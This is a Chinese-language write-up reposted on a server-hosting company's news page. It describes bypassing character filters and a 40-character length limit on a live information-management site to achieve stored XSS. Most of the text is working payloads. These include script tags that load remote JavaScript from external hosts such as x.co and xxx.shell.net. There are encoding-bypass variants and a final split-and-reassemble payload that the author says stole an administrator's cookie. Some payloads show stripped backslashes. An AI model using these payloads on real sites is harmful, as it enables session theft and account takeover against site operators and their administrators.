新西兰服务器
  • 电 话:400-808-5836
  • MSN :huad@live.com
  • 客服QQ:4698328 9291215
  • 咨询邮箱:sales@fobhost.com
  • 售后:services@fobhost.com
  • https://www.gaofangfuwuqi.com/
    • 首页 新闻资讯 绕过某通用信息管理系统实现XSS

    绕过某通用信息管理系统实现XSS


    绕过某通用信息管理系统实现XSS

    发布时间:2021-11-23 22:49:38 来源:高防服务器网 阅读:71 作者:柒染 栏目:网络安全

    这篇文章将为大家详细讲解有关绕过某通用信息管理系统实现XSS,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。

    序言

    实战渗透某站点时遇到的,经过几天研究最终成功绕过限制并打到管理员cookie,特此记录下备忘。将一些琐碎的trick和知识点进行了有机结合与综合实践,希望本文能对读者有所帮助,若有谬误,还请指正。

    准备工作

    首先看看站点,事先测过了SQL等漏洞,这里只测试XSS。

    先尝试填充一些正常数据以判断是否会回显payload,经过测试,该站点提交信息会直接跳转回首页,无法查看payload解析执行情况。

    注意:测试xss时往往不要一上来就怼<script>/:..等危险字符,有暴露渗透行为的风险且难以控制页面显示情况。

    看不到回显难道就要盲打嘛?

    这里提供一个思路:尝试获取该系统的源码并本地搭建进行测试。

    好的,既然思路明确了,我们就尝试去获取该系统的源码。

    1. 扫描敏感目录及文件,查看是否存在.git / .svn等代码工程文件,如果存在的话,是  可以直接通过该敏感文件还原出系统源码的。

    相关工具:https://github.com/lijiejie/GitHack

    Seay-svn 还原工具,大家可以自行下载

    1. 从源码本身着手,寻找版权相关信息,之后去网上寻找并下载源码。

    渗透该站时便使用了方法2,尝试访问后台时网页便爆出了我们想要的信息。

    搜索相关源码并下载,成功在本地搭建。

    好了,这样我们就可以放心测试xss了。

    好戏开演

    准备好payload:

    <script src="http://x.co/qwq"></script>

    这里推荐一个网站缩短服务:

    x.co

    访问设置url即可

    要是有更短的网址缩短服务可以留言分享下,毕竟在测试xss中有时仅仅缩短一个字符便能决定渗透成功与否。

    提交payload后我们到后台查看效果。

    对比一下:

    <script src="http://x.co/qwq"></script><script src"http:  x.co  qwq"></script>

    可以发现= 与url中的‘/’被过滤掉

    并且页面解析了我们的<script>标签

    这里有个技巧:

    使用chrome等浏览器的开发者工具查看源代码时,如果标签是彩色的,说明被解析了,如果是黑色的,则标签已被转义而不是解析。

    那么我们便来考虑如何绕过限制。

    1. 使用其他不包含= / 的标签进行xss

    2. 编码绕过

    先从思路1入手:

    ”=”符合常见于属性处,而绝大多数xsspayload所运用的便是标签的属性,想找到一个不使用”=”的标签并不容易。

    但是还是存在几个特例的

    <script>document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,120,46,99,111,47,120,105,72,118,62,60,47,115,99,114,105,112,116,62));</script>        ascii编码绕过<script>eval(Dec('203041263543203','2549'));</script><STYLE>@import'javascript:alert("X3SS")';</STYLE>.....

    其实这里就已经结合了编码绕过的思路,故不再赘述编码绕过

    我们这里使用第一个payload,该payload完美的绕过了“=”与“/”的限制,因为特殊符号全被编码成了对应的ascii码

    提交payload,到后台查看效果

    显然,我们的payload执行成功。

    你以为这样就完了吗??

    我们现在去目标站测试下

    再看看payload的长度

    所以好戏才刚刚开始啊…

    也许有读者会问为什么同样的payload却遇到了限制呢?

    这点可以在管理后台获得解答。

    说明目标站的数据项做了长度限制。经过测试,目标站所有的数据项长度都被限制到了40个字符,那么我们来考虑绕过。

    这里提供一种巧妙的思路:payload分割起来并储存在相应的变量中,拼接变量后执行。

    所用的payload一般为:

    <script>z='document.'</script>  <script>z=z+'write("'</script>  <script>z=z+'<script'</script>  <script>z=z+' src=ht'</script>  <script>z=z+'tp://xx'</script>  <script>z=z+'x.shell'</script>  <script>z=z+'.net/1.'</script>  <script>z=z+'js></sc'</script>  <script>z=z+'ript>")'</script>  <script>eval_r(z)</script>

    注:此payload要求所有字符注入进同一页面。

    思路确定了,但是对于目标系统来说,该如何绕过’=’与’/’的限制呢?

    之前提过,使用编码绕过特殊字符是一座较为有效的思路,那么我们便考虑将分割注入与编码这两种思路相结合。

    补充知识:

    Unicode编码绕过

    <img src="x" onerror="&amp#97;&amp#108;&amp#101;&amp#114;&amp#116;&amp#40;&amp#34;&amp#120;&amp#115;&amp#115;&amp#34;&amp#41;&amp#59;"><img src="x" onerror="eval('u0061u006cu0065u0072u0074u0028u0022u0078u0073u0073u0022u0029u003b')">

    url编码绕过

    <img src="x" onerror="eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))"><iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>

    Ascii码绕过

    <img src="x" onerror="eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59))">

    hex绕过

    <imgsrc=xonerror=eval('x61x6cx65x72x74x28x27x78x73x73x27x29')>

    八进制

    <imgsrc=x onerror=alert('170163163')>

    base64绕过

    <imgsrc="x"onerror="eval(atob('ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly93d3cuYmFpZHUuY29tJw=='))"><iframesrc="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">

    通过观察我们可以发现,url编码,ascii编码,base64编码后的字符在执行时需要相应函数或方法进行解码,无疑增加了payload的长度,反而在整体长度有限制的情况下不利于执行。

    那么有没有一种可被直接解析并且编码后长度适中的编码方式呢?

    有!

    hex编码8进制unicode编码!

    以unicode编码为例(原理与hex,8进制大同小异,有兴趣的读者可以自行测试)

    我们先将’=’替换掉

    <script>eval(zu003d'document.')</script><script>eval(zu003dz+'write("')</script><script>eval(zu003dz+'<script')</script><script>eval(zu003dz+'src=ht')</script><script>eval(zu003dz+'tp://xx')</script><script>eval(zu003dz+'x.shell')</script><script>eval(zu003dz+'.net/1.')</script><script>eval(zu003dz+'js></sc')</script><script>eval(zu003dz+'ript>")')</script><script>eval_r(z)</script>

    注:

    1. 使用unicode,hex,8进制等编码时需要用到eval()函数

    2. 其实这里的payload并不可用,还需要经过处理,只是为了展现思路历程

    下一步处理一些细节:

    1. eval内的引号需要转义

    2. 进一步的缩短payload

    请大家思考:

    只用一个变量z进行存储,在之后的每一步中拼接字符串是否为最优的方法?

    个人认为,在总长度允许的情况下,可以将不同的payload存储在不同的变量中,

    例如:

    <script>eval('au003d'docu'')</script><script>eval('bu003d'ment'')</script><script>eval('cu003d'.wri'')</script><script>eval('du003d'te("'')</script><script>eval('eu003d'<scr'')</script>

    这样便可以省去”z+”这两个字符

    最后进行拼接

    <script>eval('zu003da+b+c+d+e')</script>

    拼接字符时只是单纯的变量加减,并不需要转义等复杂操作增添新的字符,payload的长度还在可以接受的范围内。

    如果读者对整个过程存在疑问,推荐自己写一个过滤掉“=”与url中“/”的环境进行测试,能帮助你更好的理解本文。

    贴一下最终的payload:

    <script>eval('au003d'docu'')</script><script>eval('bu003d'ment'')</script><script>eval('cu003d'.wri'')</script><script>eval('du003d'te("'')</script><script>eval('eu003d'<scr'')</script><script>eval('fu003d'ipt'')</script><script>eval('gu003d'src'')</script><script>eval('px3d'x3d'')</script><script>eval('hu003d'http'')</script><script>eval('iu003d'://x'')</script><script>eval('ju003d'.co/'')</script><script>eval('ku003d'6nx2'')</script><script>eval('lu003d'r></'')</script><script>eval('mu003d'scri'')</script><script>eval('nu003d'pt>"'')</script><script>eval('ou003d')'')</script><script>eval('zx3da+b+c+d+e')</script><script>eval('zx3dz+f+g+p+h')</script><script>eval('zx3dz+i+j+k+l')</script><script>eval('zx3dz+m+n+o')</script><script>eval(eval('z'))</script>

    你以为这样就完了吗?不!还没完!

    我们提交下该payload

    为什么会报错某些变量没有被定义呢?

    我们的payload在本地chrome测试是完美成功的啊

    不应该存在语法上的错误啊

    这就要讲到另一个知识点了:

    原来JS引擎并非一行行去分析和执行程序,而是一段一段的执行(如3),而且在同一段程序的分析执行中,定义式的函数语句会被优先执行。函数定义执行完以后才会按顺序执行其他语句代码。

    在经过预处理后,js引擎才会从上到下依次执行。

    想想我们的注入顺序?

    <script>eval('au003d'docu'')</script><script>eval('bu003d'ment'')</script><script>eval('cu003d'.wri'')</script><script>eval('du003d'te("'')</script><script>eval('eu003d'<scr'')</script><script>eval('fu003d'ipt'')</script><script>eval('gu003d'src'')</script><script>eval('px3d'x3d'')</script><script>eval('hu003d'http'')</script><script>eval('iu003d'://x'')</script><script>eval('ju003d'.co/'')</script><script>eval('ku003d'6nx2'')</script><script>eval('lu003d'r></'')</script><script>eval('mu003d'scri'')</script><script>eval('nu003d'pt>"'')</script><script>eval('ou003d')'')</script><script>eval('zx3da+b+c+d+e')</script><script>eval('zx3dz+f+g+p+h')</script><script>eval('zx3dz+i+j+k+l')</script><script>eval('zx3dz+m+n+o')</script><script>eval(eval('z'))</script>

    最终执行变量的语句却放在了页面上端,js引擎在执行时自然会报错。

    所以把之前的payload倒序注入即可。(相信我这真的是最后一次了)

    成功打到cookie.

    关于绕过某通用信息管理系统实现XSS就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。

    [微信提示:高防服务器能助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。

    [图文来源于网络,不代表本站立场,如有侵权,请联系高防服务器网删除]
    [